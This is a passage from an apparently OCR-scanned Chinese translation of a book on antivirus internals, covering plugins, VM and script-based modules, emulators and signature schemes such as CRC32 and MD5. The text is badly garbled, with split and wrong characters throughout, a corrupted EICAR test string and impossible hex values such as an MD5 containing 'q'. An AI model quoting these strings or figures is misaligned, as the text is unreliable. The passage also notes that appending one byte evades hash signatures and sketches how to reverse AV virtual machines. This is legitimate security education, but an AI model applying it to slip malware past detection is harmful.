现 什么 样 的 状况 ? 毫 无 疑问 ,这 会 造成 任意 应 用 读 取 内 核 内 存 的 严重 安全 问题 , 任何 知道 这 一 通 
信 层 和 恰当 IOCTL 的 用 户 态 应 用 都 可 以 读 取 内 核 内 存 。 如 果 内 核 驱 动 提供 对 内 核 内 存 的 写 入 组 件 
的 话 ( 通过 额外 的 IOCTL )， 将 会 使 得 问题 更 加 严重 。 


负载 模块 分 析 与 内 存 分 析 
有 些 反 病毒 产品 声称 支持 内 存 分 析 , 但 是 这 种 表述 并 不 准确 。 这 些 产 品 仅仅 分 析 正 在 执行 
的 进程 和 使 用 硬盘 文件 的 负载 模块 。 内 存 分 析 技 术 会 被 外 界 程序 和 干扰， 使 用 时 需要 相当 小 心 ， 
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因为 它 能 够 被 自身 的 调试 引擎 、 文 件 检测 引擎 以 及 逆向 引擎 甄别 出 来 ,从 而 导致 无 法 正常 工作 。 
在 某 种 程度 上 说 , 这 种 设计 有 助 于 保护 软件 程序 的 知识 产权 。 反 病毒 程序 公司 会 尽量 让 自家 产 
品 静 默 地 运行 。 一些 公司 干脆 使 引擎 不 去 干扰 正在 读 取 内 存 的 进程 , 因为 这 会 妨碍 合法 应 用 程 
序 的 正常 运行 ,他 们 的 观点 便 是 让 反 病 毒 引 擎 能 够 充分 读 取 磁盘 上 的 文件 模块 。 


3.3.2” 非 本 机 代码 


出 于 性 能 的 考虑 ， 反 病毒 软件 内 核 通 常 使 用 C 或 C++ 语言 编写 ， 但 也 可 以 使 用 更 高 级 的 编程 
语言 编写 插件 模块 。 一 些 反 病毒 产品 使 用 .NET 或 其 他 需要 使 用 虚拟 机 解释 执行 特定 的 编程 语言 
来 创建 插件 C 比如 通用 检测 插件 、 感 染 修复 插件 或 启发 式 检测 引擎 )。 反 病毒 厂商 采取 该 项 措施 ， 
有 以 下 几 个 方面 的 考虑 。 

口 复杂 性 ”使 用 高 级 语言 编写 扫描 程序 、 感 染 修复 程序 或 启发 式 引擎 会 更 容易 。 

口 安全 性 ”如 果 编 写 插件 模块 使 用 的 语言 运行 在 虚拟 机 中 ， 在 解析 复杂 文件 格式 或 修复 感 
染 型 病毒 的 过 程 中 出 现 了 bug， 也 不 会 影响 整个 产品 ， 而 只 会 影响 进程 运行 的 虚拟 机 、 模 
拟 需 或 解释 器 。 

口 调试 能 力 “ 如 果 使 用 特定 的 编程 语言 编写 通用 扫描 程序 、 感 染 修复 程序 或 启发 式 引 擎 ， 

且 反 病 毒 软 件 提供 封装 的 API, 反 病 毒 软件 开发 者 就 可 以 使 用 对 应 编程 语言 提供 的 相关 工 

具 调 试 代码 。 

出 于 安全 目的 使 用 非 本 机 语言 编写 程序 时 ， 上 述 第 一 和 第 三 点 原因 常常 被 忽略 。 例 如 , 一 些 
反 病 毒 产 品 会 创建 一 个 名 为 matrix 的 沙 盒 环 境 ， 来 运行 解析 器 和 通用 查 杀 程 序 的 代码 ， 而 不 是 直 
接 运 行 本 机 语言 编写 的 代码 。 这 也 就 意味 着 ， 如 果 反 病 毒 软 件 中 存在 漏洞 ， 比 如 存在 一 个 缓冲 区 
游 出 ， 也 不 会 直接 影响 到 整个 扫描 器 的 工作 〈 比如 通常 以 SYSTEM 或 root 权 限 运 行 的 反 病 毒 后 台 
常 驻 程 序 )。 反 病毒 软件 采取 的 这 项 措施 迫使 攻击 者 们 在 编写 反 病 毒 软 件 漏洞 利用 程序 的 同时 ， 
为 了 能 够 绕 过 利用 限制 , 而 去 研究 相应 的 虚拟 机 。 这 往往 需要 多 个 漏洞 利用 程序 。 男 一 方面 ， 
些 反 病 毒 产品 创建 一 个 完整 的 指令 集 ， 并 提供 了 API 接 口 ， 但 没有 提供 调试 代码 的 调试 器 ， 这 给 
反 病 毒 工程 师 的 工作 带 了 不 小 的 挑战 。 

如 果 你 向 Symantec 公司 之 前 的 老 员 工 提 起 GVM ( Guest Virtual Machine )， 他 们 将 告诉 你 它 的 
各 种 “劣迹 "。 在 过 去 ，GVM 不 允许 通过 调试 器 调试 代码 。 这 迫使 开发 者 们 发 明 独 立 的 调试 技术 
来 摘 清 楚 代 码 到 底 哪里 出 了 问题 。 更 糟糕 的 是 , 由 于 在 这 类 虚拟 机 中 没有 针对 相关 代码 的 解释 器 
或 编译 器 , 反 病 毒 软 件 常常 会 将 相关 检测 逻辑 直接 用 汇编 语言 编写 。 在 这 种 情况 下 ， 如 果 你 使 用 
一 些 熟悉 的 反 汇 编 软件 (比如 OllyDbg、GDB 和 IDA ) 进行 调试 ， 就 会 了 解 反 病毒 行业 中 用 户 虚 
拟 机 技术 的 工程 师 少 的 可 怜 的 原因 了 。 

反 病 毒 软件 常用 的 非 本 机 语言 是 Lua 和 .NET, 一些 反 病 毒 软 件 厂 商会 因地制宜 地 针对 自家 虚 
拟 机 支持 的 格式 编写 .NET 字 节 码 解释 器 ， 还 有 一 些 厂商 则 会 直接 将 现成 的 .NET 虚 拟 机 直接 内 置 
在 他 们 的 反 病 毒 产品 中 ; 男 外 有 些 厂商 会 将 Lua 作 为 编程 高 级 语言 ， 因 为 Lua 轻 巧 、 运 行 速度 快 ， 
同时 能 够 很 好 地 处 理 字 符 串 ， 此 外 还 允许 在 商业 闭 源 版 本 的 反 病 毒 软件 中 被 使 用 。 
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对 于 反 病 毒 软 件 开 发 者 来 说 , 尽管 使 用 非 本 机 语言 编写 会 带 来 难以 调试 的 问题 , 但 使 用 .NET 
类 的 语言 ( 比如 C# ) 比 使 用 C 或 C++ 来 编写 相关 程序 要 容易 得 多 。 另 外 很 重要 的 一 点 是 ， 显 而 易 
见 ， 在 程序 出 现 bug 的 情况 下 ， 使 用 托管 式 语言 会 比 非 托管 式 语言 要 安全 得 多 ; 如 果 代 码 在 虚拟 
机 内 运行 ,漏洞 利用 程序 编写 者 需要 结合 不 止 一 个 bug 来 突破 虚拟 机 运行 环境 的 限制 ， 使 漏洞 利 
用 的 过 程 更 加 复杂 。 男 外 ， 相 比 使 用 C 或 C++ 语 言 编 写 的 程序 ， 使 用 托管 式 语言 编写 的 程序 出 现 
漏洞 的 概率 会 小 很 多 。 

但 从 逆向 分 析 角 度 来 看 ， 如 果 目 标 反 病 毒 产品 使 用 了 某 些 虚拟 机 技术 ， 那 这 真是 一 个 璐 梦 。 
拿 反 病毒 软件 ACME AV 来 说 ， 在 开发 过 程 中 ， 该 反 病 毒 软件 实现 了 自己 的 一 套 虚 拟 机 ， 其 大 多 
数 病毒 侦 测 、 感 染 修复 以 及 启发 式 扫描 程序 都 围绕 这 套 虚拟 机 进行 开发 。 但 如 果 不 是 标准 虚拟 机 
的 话 ， 可 怜 的 分 析 员 就 需要 通过 下 列 步 又 进行 分 析 了 。 

(1) 找到 编写 虚拟 机 使 用 的 代码 。 当 一 位 闭 向 工程 师 开 展 相 关 逆 向 工作 时 ， 有 关 虚 拟 机 的 信 
息 当 然 必 不 可 少 。 

(2) 找 出 虚拟 机 支持 的 所 有 指令 集 。 

(3) 针对 新 找 出 的 指令 集 ， 编 写 反 汇编 工具 ， 这 类 工具 常常 会 使 IDA 的 模块 处 理 插 件 。 

(4) 找 出 反 病 毒 插 件 模块 程序 释放 的 二 进 制 文件 位 置 (通常 可 以 在 插件 安装 目录 文件 或 内 存 
中 找到 )， 并 将 找到 的 二 进 制 文件 提取 出 来 。 

(5) 使 用 IDA 或 第 3 步 中 定制 的 反 汇 编程 序 着 手 分 析 运 行 在 虚拟 机 中 的 相关 插件 。 

但 真实 情况 远 远 不 止 这 些 ,， 可 能 还 会 更 糟 ; 虽然 并 不 常见 , 但 在 Themida 或 VMProtect 等 软件 
防护 工具 中 还 是 能 见 到 。 如 果 相 关 虚 拟 机 随机 生成 ,每 一 版 本 都 会 完全 不 同 , 那么 分 析 代 码 的 难 
度 便 会 呈 指 数 增加 。 因 此 ,每 当 新 版 本 的 虚拟 机 发 布 后 ,新 的 反 汇编 工具 ， 可 能 是 模拟 器 或 基于 
上 一 版 本 虚拟 机 指令 集 开 发 的 逆向 分 析 软 件 , 需 要 被 更 新 或 彻底 重 写 一 次 。 对 于 安全 人 研究 者 来 说 ， 
问题 还 不 仅 限 于 此 ,如 果 开 发 者 们 都 无 法 使 用 工具 调试 自己 的 代码 , 对 于 安全 研究 者 来 说 就 更 不 
可 能 了 。 因 此 ， 他 们 需要 针对 这 种 情况 编写 一 个 模拟 器 或 调试 程序 。 

研究 这 类 插件 的 过 程 十 分 复杂 ， 但 如 果 你 选取 研究 的 虚拟 机 已 经 被 广泛 使 用 ， 比 如 .NET 虚 
拟 机 ， 就 可 能 幸运 地 发 现 潜藏 在 角落 里 完整 的 NET 库 或 可 执行 文件 ， 进 而 使 用 普通 的 反 编 译 软 
件 比 如 开源 的 ILSpy 或 其 他 商业 版 工具 ( .NET Reflector ) 开展 逆向 分 析 了 。 这 样 整 个 分 析 过 程 大 
大 简化 ， 你 可 以 直接 阅读 高 级 语言 ( 带 有 变量 和 函数 名 )， 而 不 是 那些 不 太 友好 的 汇编 语言 了 。 





















































































































































3.8.89 ”脚本 语言 


反 病 毒 产品 可 能 会 使 用 脚本 语言 来 执行 通用 扫描 程序 、 感 染 修复 程序 、 启 发 式 引 擎 ， 等 等 。 
脚本 语言 可 能 是 Lua 其 至 是 JavaScript。 在 之 前 的 案例 中 ,使 用 脚本 语言 执行 前 面 提 到 的 多 个 功能 
的 原因 是 一 致 的 : 安全 性 、 可 调试 性 和 开发 复杂 性 。 当 然 ， 使 用 脚本 语言 也 有 商业 层面 的 考虑 : 
招聘 好 的 高 级 编程 语言 的 程序 员 ， 要 比 招聘 好 的 C 或 C++ 程序 员 容 易 得 多 。 因 此 ， 新 进入 反 病 毒 
软件 公司 的 工程 师 事实 上 并 不 需要 了 解 如 何 使 用 C 或 C++ 甚至 是 汇编 语言 ， 因 为 他 们 只 需要 使 用 
Lua、JavaScript 或 其 他 反 病 毒 软件 内 核 支 持 的 脚本 语言 编写 。 这 意味 着 ， 程 序 员 只 需要 了 解 反 病 
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毒 软件 支持 的 API， 就 可 以 编写 相关 插件 模块 了 。 

和 前 面 的 示例 一 样 , 我 们 也 从 两 个 角度 阐释 反 病毒 产品 中 的 插件 模块 通过 脚本 语言 执行 的 方 
式 : 反 病 毒 软件 开发 者 角度 以 及 研究 者 角度 。 对 反 病 毒 厂 商 来 说 ,使 用 高 级 语言 编写 程序 代码 更 
容易 ， 因 为 这 样 更 安全 ， 而 且 更 容易 招聘 到 好 的 程序 员 。 对 于 逆向 分 析 者 来 说 ， 与 一 般 的 虚拟 机 
技术 相反 ,如 果 反 病毒 产品 直接 通过 脚本 执行 相关 操作 ,研究 者 只 需要 找到 脚本 在 哪里 ,然后 导 
出 并 开始 分 析 真 实 的 源 代 码 。 如 果 脚 本 被 编译 成 了 某 种 字 节 码 , 运气 好 的 话 , 研究 者 就 会 发 现 反 
病毒 产品 中 的 虚拟 机 般 入 的 是 标准 的 脚本 语言 ， 比 如 Lua， 接 着 找到 一 款 已 经 编写 好 的 反 编译 程 
序 ， 比 如 开源 的 unluac 程 序 。 研 究 者 需要 针对 脚本 语言 ， 对 这 些 反 编译 工具 做 一 些小 的 改动 ， 以 
正确 获取 到 真实 的 脚本 代码 ， 而 这 仅仅 需要 花费 几 个 小 时 的 时 间 。 


3.3.4 ”模拟 器 


模拟 需 是 反 病 毒 软件 中 十 分 重要 的 一 个 部 分 。 它 们 可 以 用 来 完成 许多 工作 ， 比 如 分 析 可 疑 样 
本 行为 、 对 加 壳 或 使 用 未 知 算法 加 密 的 样本 做 解 包 分 析 、 分 析 髓 在 文件 中 的 Shellcode， 等 等 。 除 
ClamAV 外 ， 大 部 分 反 病 毒 引 擎 都 会 至 少 使 用 一 个 模拟 器 : Intel 8086 模 拟 器 。 模 拟 器 一 般 会 借助 
其 他 加 载 模块 (有 时 会 和 模拟 器 的 代码 写 在 一 起 )、 引 导读 区 以 及 Shellcode 模 拟 分 析 PE 文 件 。 一 
些 反 病毒 产品 也 会 用 模拟 器 来 分 析 ELF 文 件 ， 但 目前 还 没有 发 现 有 反 病 毒 软件 用 模拟 器 来 分 析 
MachO 文 件 。 

Intel x86 模 拟 需 并 不 是 反 病毒 引擎 的 唯一 选择 。 一 些 模拟 需 也 会 用 于 ARM 、x88_ 64、.NET 
字 节 码 ， 甚 至 是 JavaScript 或 ActionScript 的 分 析 。 如 果 亚 意 软件 进行 了 许多 系统 或 API 调 用 ,那么 
模拟 需 的 作用 就 会 被 削弱 。 这 是 因为 模拟 器 会 限制 API 调 用 的 数量 ， 以 免 其 中 断 模拟 过 程 。 支 持 
间 令 集 及 其 相关 架构 就 实现 了 模拟 二 进 制 文件 功能 的 一 半 。 另 一 半 是 要 正确 模拟 API 的 调用 。 模 
拟 器 的 另 一 项 职责 是 支持 真实 操作 系统 或 模拟 环境 的 系统 调用 或 API 调 用 。 通 常 ， 反 病毒 软件 会 
支持 调用 类 似 ntdll.dll 或 kernel32.dll 的 Windows 动 态 链接 库 的 常见 调用 操作 。 大 多 数 情况 下 ， 被 执 
行 的 函数 除了 返回 成 功 执 行 有 返回 值 的 代码 外 并 不 会 做 其 他 操作 。 模 拟 用 户 态 的 程序 也 是 一 样 
的 : 模拟 产品 ( 比如 Internet Explorer 或 Acrobat Reader ) 提供 的 API 操 作 。 这 样 做 相关 代码 不 会 失 
效 ， 而 是 会 完成 相关 操作 。 无 论 操 作 行 为 是 否 恶意 ， 模 拟 需 都 会 一 一 记录 并 分 析 。 

由 于 几乎 每 天 都 有 恶意 软件 制作 者 和 商业 保护 软件 的 开发 者 开发 并 使 用 新 的 反 模 拟 技术 , 模 
拟 器 会 经 常 更 新 。 当 反 病 毒 工程 师 发 现 新 的 指令 或 API 正 在 被 恶意 软件 或 保护 壳 使 用 时 ， 模 拟 器 
中 相关 指令 或 API 就 会 被 更 新 ， 以 兼容 这 些 恶意 软件 或 保护 壳 的 操作 。 接 着 恶意 软件 作者 和 保护 
软件 的 开发 者 会 找到 并 使 用 更 多 的 指令 或 API。 在 反 病 毒 领域 ， 一 直上 演 着 猫 提 老鼠 的 游戏 。 原 
因 很 简单 ,支持 整个 CPU 架构 无 疑 是 一 项 大 工程 。 让 桌面 版 反 病毒 软件 中 的 模拟 器 不 仅 支 持 整个 
CPU 还 要 支持 操作 系统 的 API 的 模拟 ， 同 时 不 产生 巨大 的 性 能 消耗 ， 是 一 项 根本 不 可 能 完成 的 任 
务 。 反 病毒 厂商 试图 做 的 是 ， 在 不 模拟 所 有 指令 集 或 API 的 情况 下 ， 权 衡 需要 支持 的 API 和 指令 ， 
并 尽 可 能 多 地 模拟 恶意 软件 行为 。 因 此 , 他们 会 等 到 新 的 反 模 拟 技术 出 现在 恶意 软件 、 封 装 工具 
或 保护 工具 出 现 后 ， 再 进行 相关 调整 。 





















































































































































































































































总 结 


/AN 2A 


本 章 主要 讲述 了 反 病 毒 软件 中 的 插件 模块 是 如 何 加 载 的 、 插 件 的 种 类 以 及 搬 件 的 功能 特性 。 








简 而 言 之 ， 本 章 讨论 了 以 下 几 点 。 





口 反 病 毒 软件 中 的 插件 模块 是 其 重要 组 成 部 分 ， 在 有 和 需要 的 时 候 插件 模块 会 被 调用 。 

口 反 病毒 软件 通过 多 种 方式 加 载 插 件 。 一 些 反 病毒 软件 加 载 插件 依赖 于 操作 系统 提供 的 

API， 而 男 一 些 会 自己 定制 插件 解密 和 加 载 机 制 。 

a 反 病 毒 软件 的 插件 模块 加 载 过 程 揭示 了 ， 对 于 逆向 分 析 者 来 说 ， 首 向 分 析 它 们 的 内 部 功 

能 是 多 么 困难 的 一 件 事 。 

口 了 解 插件 的 功能 实现 时 ， 有 一 些 固定 的 步骤 可 供 逆 向 分 析 工 程 师 参 考 。 

O 反 病毒 插件 模块 五 花 八 门 ， 有 简单 的 也 有 复杂 的 。 相 对 简单 的 插件 包括 扫描 器 以 及 通用 
检测 程序 、 文 件 格 式 解 析 器 、 协 议 解 析 器 、 可 指定 文件 和 档案 文件 解压 缩 程 序 以 及 启发 
式 引 擎 ， 等 等 。 

口 启发 式 引 擎 用 于 对 传人 文件 进行 异常 判断 。 这 类 引擎 一 般 基 于 简单 或 更 为 复杂 的 检测 逻 

辑 ， 比 如 有 一 些 基于 统计 建 模 ( 贝 叶 斯 网 络 ) 或 权重 启发 式 检测 。 

口 有 两 种 类 型 的 启发 式 引擎 : 静态 和 动态 。 静 态 引擎 直接 对 文件 进行 静态 分 析 ， 不 用 执行 
或 模拟 执行 文件 。 例 如 ，PE 文 件 的 文件 头 内 有 畸形 的 区 块 或 PDF 文件 内 引入 了 使 用 多 种 
加 密 手 段 多 次 加 密 的 文件 流 ， 就 可 以 触发 静态 启发 式 引 擎 检测 规则 。 动 态 启发 式 引擎 则 
尝试 通过 直接 执行 或 模拟 执行 文件 代码 ， 捕 获 文件 操作 ， 并 以 此 为 依据 查 杀 恶意 软件 。 

口 文件 格式 或 协议 解析 器 在 解析 复杂 或 畸形 格式 的 时 候 ， 常 常会 产生 安全 漏洞 。 

口 高 级 反 病毒 插件 模块 包括 内 存 扫 描 器 、 使 用 解释 型 语言 编写 并 在 虚拟 机 中 执行 的 插件 ， 

以 及 模拟 器 。 

内 存 扫描 插件 可 以 分 别 从 用 户 态 和 内 核 态 扫描 内 存 。 用 户 态 扫描 器 容易 受 干扰 ， 并 可 能 

会 因此 影响 程序 的 执行 。 内 核 态 扫描 器 往往 具有 较 强 的 抗 干 扰 性 ， 但 如 果 执 行 不 当 的 话 ， 

往往 会 出 现 安全 漏洞 。 

口 使 用 脚本 语言 编写 的 插件 模块 不 仅 容易 编写 和 维护 ， 而 且 在 原 有 基础 上 多 了 一 层 编译 髓 
的 保护 。 逆 向 分 析 此 类 插件 的 时 候 ， 由 于 代码 运行 在 定制 的 虚拟 机 中 ， 逆 向 过 程 会 变 得 
困难 重重 。 

口 模拟 器 是 一 款 反 病毒 软件 的 核心 部 分 。 针 对 不 同 的 架构 编写 万 无 一 失 、 人 性 能 良好 的 模拟 
器 不 是 一 项 容易 的 工作 。 然 而 ， 编 写 模拟 器 对 于 解析 压缩 或 加 密 可 执行 文件 以 及 分 析 内 
置 在 文件 中 的 Shellcode 大 有 帮助 。 

下 一 章 将 讨论 反 病 毒 特征 码 的 工作 原理 及 其 绕 过 方式 。 
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反 病 毒 特征 码 技术 











在 反 病 毒 引 擎 中 , 特征 码 扮演 着 至 关 重要 的 角色 。 特 征 码 一 般 是 用 于 判定 文件 或 缓冲 区 是 否 
包含 恶意 代码 的 一 串 散 列 值 或 字 节 码 。 

所 有 反 病 毒 引擎 自始至终 都 在 使 用 特征 码 技术 。 尽 管 具体 形式 多 种 多 样 , 但 特征 码 一 般 是 一 
串 包含 判断 文件 或 缓冲 区 中 是 否 存 在 已 知 恶 意 文件 特征 的 短小 散 列 值 或 字 节 码 。 散 列 通 过 特定 的 
算法 ( 比如 CRC 或 MD5 ) 生成 散 列 值 ， 以 作为 特征 码 使 用 。 这 类 算法 计算 速度 快 ， 可 以 在 每 秒 内 
计算 许多 次 ， 且 不 会 消耗 大 量 资源 。 因 为 特征 码 算法 很 容易 执行 且 运 行 速度 快 ， 所 以 它 是 反 病毒 
工程 师 最 常用 也 最 偏爱 的 恶意 软件 检测 方法 。 

本 章 将 介绍 各 类 特征 码 数据 库 类 型 及 其 优 缺 点 , 特征 码 在 什么 时 候 能 发 挥 最 佳 效 果 , 以 及 如 
何 绕 过 特征 码 检测 技术 。 


4.1 典型 特征 码 


即使 不 同 的 反 病 毒 引 擎 使 用 不 同 的 算法 生成 特征 码 , 同时 几乎 所 有 三 商都 有 自己 生成 特征 码 
的 算法 技术 , 但 我 们 还 是 能 在 它们 之 间 找 到 一 些 共通 点 。 一 些 生成 特征 码 的 算法 虽然 误 报 多 , 但 
是 速度 相当 快 ; 另 一 些 特征 码 ( 一般 消耗 更 大 ) 虽 然 误 报 率 低 , 但 匹配 扫 措 的 时 间 消 耗 特别 长 (以 
桌面 反 病毒 软件 的 角度 来 看 )。 接 下 来 的 几 节 将 会 介绍 特征 码 典型 例子 ， 并 讨论 各 自 的 优 缺 点 。 






























































4.1.1 5 Ak 


字 节 流 是 最 简单 的 反 病 毒 特 征 码 形式 ， 一 般 不 出 现在 正常 文件 中 ， 而 是 仅 限 于 亚 意 软件 中 。 
比如 ， 要 侦 测 欧洲 计算 机 反 病 毒 协会 (EICAR ) 的 测试 样本 文件 ， 反 病毒 引擎 只 需 匹 配 搜 索 下 面 
这 段 完 整 字符 串 : 

X501P$GAP[AVPZX54 (P^) 7CC) 7) SEICAR- STANDARD-ANTIVIRUS-TEST-FILE!SH4H* 

如 你 所 见 ， 侦 测 病毒 最 简单 的 方式 就 是 匹配 特征 字符 流 ， 因 为 其 简单 而 快速 。 同 时 ,任何 人 
都 可 以 查找 到 许多 稳定 有 效 的 字符 串 匹 配 算法 〈 比如 Aho-Corasick 、 Knuth-Morris-Pratt 、 
Boyer-Moore 等 )。 不 过 这 类 算法 在 容易 实现 的 同时 也 会 出 现 一 些 问题 : 如 果 正 常 文件 中 也 带 有 与 
恶意 软件 相似 的 字符 串 ， 就 会 发 生 误 报 ， 也 就 是 说 正常 文件 被 反 病 毒 软件 当成 恶意 软件 查 杀 了 。 
的 确 ， 很 难 预测 到 底 有 和 多少 反 病毒 软件 会 查 杀 带 有 上 面 EICAR 样 本 特征 字 节 码 的 文件 。 
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4.1.2. TUS 


目前 反 病 毒 最 常用 的 特征 码 匹 配 技 术 是 基于 计算 匹配 CRC 实 现 的 。 循 环 宛 余 检 查 (cyclic 
redundancy check, CRC ) 算法 基于 错误 侦 测 技术 ， 常 用 于 检测 或 校 验 数据 传输 或 者 保存 后 可 能 
出 现 的 错误 。 该 算法 的 实现 原理 是 ， 取 一 个 缓冲 区 的 内 容 作 为 传 入 值 ， 经 过 计算 ,生成 一 段 校 验 
和 形式 的 、 长 度 一 般 为 4 字 节 的 散 列 ( 如 果 使 用 的 是 CRC32 的 话 就 是 32 位 )。 接 着 ， 反 病毒 程序 会 
将 整个 或 所 选 的 部 分 缓冲 区 或 文件 计算 对 应 的 CRC 校 验 和 与 特定 的 恶意 软件 特征 进行 对 比 , 以 前 
面 的 EICAR 病 毒 测 试 样本 文件 为 例 ， 其 CRC32 校 验 和 为 0x6851CF3C。 反 病毒 引擎 会 通过 计算 整 
个 缓冲 区 而 不 是 部 分 数据 ( 即 ， 第 一 个 2Kb 大 小 的 代码 块 ， 最 后 一 个 2 Kb 大 小 的 代码 块 ， 以 此 类 
HE) 的 CRC32 校 验 和 ， 或 分 析 文 件 划分 出 来 的 特定 部 分 ( 即 ， 校 验 PE 或 ELF 文 件 的 特定 区 块 ) 来 
侦 测 测试 样本 文件 。 

和 之 前 的 案例 一 样 ，CRC 算 法 校 验 速 度 快 但 也 会 产生 大 量 的 误 报 。 因 为 CRC 算 法 的 初衷 是 : 
检测 或 校 验 数据 传输 或 者 保存 后 可 能 出 现 的 错误 ， 而 不 是 查 杀 病 毒 。 因 此 , 在 使 用 CRC32 算 法 进 
行 病毒 侦 测 的 过 程 中 , 不 同文 件 的 校 验 存在 冲突 的 情况 屡见不鲜 , 也 由 此 产生 了 针对 正常 文件 的 
KERR 一 些 反 病 毒 引 擎 会 对 匹配 查 杀 过 程 采取 一 些 额 外 的 校 验 措施 ， 比 如 首先 取 一 小 段 字 符 
E (前 级 )， 接 着 从 前 组 处 取 设 定 长 度 的 数据 ， 对 缓冲 区 进行 CRC32 校 验 。 即 便 如 此 ， 与 其 他 方 
式 相 比 ， 这 种 方法 产生 误 报 的 数量 要 多 得 多 。 举 个 简单 的 例子 ，petfood 和 eisenhower 这 两 个 词 的 
CRC32 校 验 和 是 一 样 的， 都 是 0xp0132158 。 再 比如 ，MD5 值 为 7f80e21c3d249ddq514565 
eed459548c7 的 文件 ， 其 CRC32 校 验 和 同 欧 洲 反 病毒 协会 的 测试 样本 文件 有 着 相同 的 校 验 和 ， 
也 因此 导致 不 少 杀毒 软件 对 其 产生 了 误 报 ， 如 VirusTotal 网 站 报告 所 示 : https://www.virustotal. 
com/file/83415a507502e5052d425f2bd3a5b16f25eae3613554629769ba06b4438d17f9/analysis/; 














































































































改进 的 CRC 算 法 

从 目前 的 分 析 情 况 来 看 , 几乎 所 有 反 病 毒 软件 都 在 使 用 CRC32 算 法 ,但 是 , 在 某 些 情况 下 ， 
反 病 毒 引 擎 不 会 使 用 原生 的 CRC32 算 法 , 而 是 使 用 改进 版 的 算法 。 比如， 在 这 类 被 修改 过 的 算 
法 中 ， 算 法 使 用 的 常量 表 或 计算 的 回合 数 会 被 修改 。 当 你 在 分 析 反 病毒 产品 的 特征 码 技术 时 ， 
必须 要 注意 到 这 上 点。 这些 修改 过 的 CRC32 算 法 生成 的 校 验 和 可 能 会 和 原生 的 数值 有 一 些 差 异 ， 
也 因此 可 能 会 带 来 一 些 麻烦 。 


4.1.3 定制 的 校 验 和 


大 多 数 反 病 毒 引擎 都 会 使 用 自 研 的 类 CRC 特 征 码 算法 。 比 如 ， 一 些 反 病毒 内 核 会 在 一 些 
Windows PE 可 执行 文件 部 分 区 块 的 CRC 校 验 和 基础 上 ， 再 做 一 次 XOR 运 算 ， 将 运算 结果 作为 匹 
配 某 些 PE 文件 的 散 列 值 。 另 外 还 有 一 些 反 病毒 引擎 会 对 数据 块 执行 算数 运算 和 移 位 , 生成 一 小 段 
DWORD 或 QWORD 作 为 特征 码 。 一 些 反 病毒 引擎 会 对 文件 的 不 同 部 分 生成 不 同 的 CRC32 校 验 和 
(比如 文件 头 部 和 尾部 的 CRC32 校 验 和 )， 然 后 使 用 计算 结果 作为 联合 匹配 的 特征 。 
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自 定义 校 验 和 的 案例 实在 太 多 了 ， 本 书 就 不 一 一 列举 了 。 最 有 意思 的 是 , 除了 让 企图 进行 逆 
向 分 析 的 攻击 者 不 知道 相关 计算 函数 的 位 置 结构 以 及 如 何 实现 外 ,这 类 自 定义 校 验算 法 的 行为 ， 
对 反 病毒 软件 开发 者 来 多 并 没有 多 大 好 处 。 和 原生 的 CRC32 算 法 一 样 , 这 类 基于 校 验 和 的 特征 码 
病毒 查 杀 方式 特别 容易 出 现 误 报 。 这 也 是 为 什么 整个 反 病 毒 行业 早 就 已 经 打算 采用 另 一 种 更 为 稳 
定 的 散 列 函数 加 密 散 列 。 


4.1.4 加 密 散 列 算法 


加 密 散 列 函 数 针对 缓冲 区 逐一 生成 特征 码 , 大 大 降低 了 误 报 的 可 能 性 C 因为 这 种 方式 计算 出 
的 特征 不 太 可 能 出 现 重复 冲突 )。 如 Wikipedia 上 写 的 那样 ， 理 想 的 加 密 散 列 函数 有 四 个 特性 : 
口 针对 传人 的 任何 数据 都 能 轻松 计算 出 散 列 值 ; 
口 加 密 散 列 值 必须 经 过 计算 才 会 生成 ; 
口 更 改 数据 时 对 应 的 加 密 散 列 值 都 会 变化 ; 
a 一 个 散 列 值 只 能 对 应 一 段 数据 特征 。 

反 病 毒 厂 商 使 用 加 密 散 列 函 数 的 原因 是 其 误 报 率 低 , 但 是 这 类 算法 也 有 缺陷 。 第 一 个 缺点 是 ， 
相 较 于 计算 CRC32 值 来 说 ， 计 算 MD5 值 或 SHA1 值 会 更 消耗 资源 。 第 二 个 缺点 是 ， 病 毒 作 者 只 要 
稍微 变动 一 下 恶意 软件 , 加 密 散 列 计算 出 的 值 就 会 完全 不 同 , 因此 使 用 这 种 算法 可 能 会 产生 一 些 
漏 报 。 不 过 ,这 也 是 加 密 散 列 算法 的 一 个 特征 : 只 要 文件 有 所 和 更改, 对 应 的 散 列 值 就 会 跟着 一 起 
变化 。 绕 过 此 类 算法 检测 技术 的 典型 方式 是 , 在 样本 文件 末尾 加 一 个 字 节 。 在 执行 的 时 候 ， 添 加 
一 个 字 节 会 被 系统 当 作 多 余 的 字符 串 直 接 忽 略 或 者 被 认为 是 见 余 , 并 且 不 会 被 宿主 机 视 为 有 缺陷 
的 或 者 遭 到 破坏 的 文件 。 

表面 上 看 起 来 , 这 类 侦 测 技术 在 当今 反 病毒 软件 中 的 使 用 并 不 频繁 , 但 事实 正好 相反 。 比如 ， 
截至 2015 年 1 月 ，ClamAV 中 有 48 000 条 特征 码 是 基于 文件 MD5 值 的 。ClamAV 每 日 特征 库 更 新 文 
件 daily.cvd 中 有 超过 1000 条 MD5 值 形式 的 散 列 值 。 目 前 反 病 毒 厂商 只 会 针对 近期 发 现 的 具有 严重 
危害 的 病毒 添加 相关 加 密 散 列 值 特征 ， 比 如 在 互联 网 上 发 现 的 下 载 者 病毒 恶意 软件 。 同时, 反 病 
毒 厂商 正在 投入 更 多 的 时 间 来 开发 更 强 更 完善 的 特征 码 技术 。 除了 前 面 提 到 的 例子 外 ,基于 加 密 
散 列 值 的 特征 码 检测 技术 几乎 一 无 是 处 ,这 是 因为 这 类 特征 码 只 能 检测 匹配 没有 修改 过 的 恶意 软 
件 ， 和 否则 ， 只 要 恶意 软件 稍微 有 所 变动 ， 就 会 被 绕 过 。 


4.2 ”高 级 特征 码 


不 少 反 病毒 软件 中 使 用 的 特征 码 并 不 是 简单 地 通过 CRC32 算 法 生成 的 。 特征 码 生 成 算法 会 因 
每 款 反 病毒 软件 而 异 , 其 中 有 一 些 算法 资源 消耗 会 很 高 , 因此 这 类 算法 只 会 在 前 期 其 他 算法 匹配 
成 功 的 情况 下 使 用 。 开 发 这 类 特征 码 生 成 算法 的 目的 是 减少 误 报 , 同时 最 大 限度 提升 对 某 个 恶意 
软件 家 族 而 不 仅 是 单个 病毒 的 侦 测 能 力 。 第 3 章 介绍 的 Bloom 过 滤器 技术 是 其 中 一 个 典型 的 高 级 
村 征 码 检 测 技术 。 在 接 下 来 的 几 节 , 我 们 将 会 讨论 各 类 反 病 毒 产 品 中 使 用 的 最 常见 的 高 级 特征 码 
种 类 。 
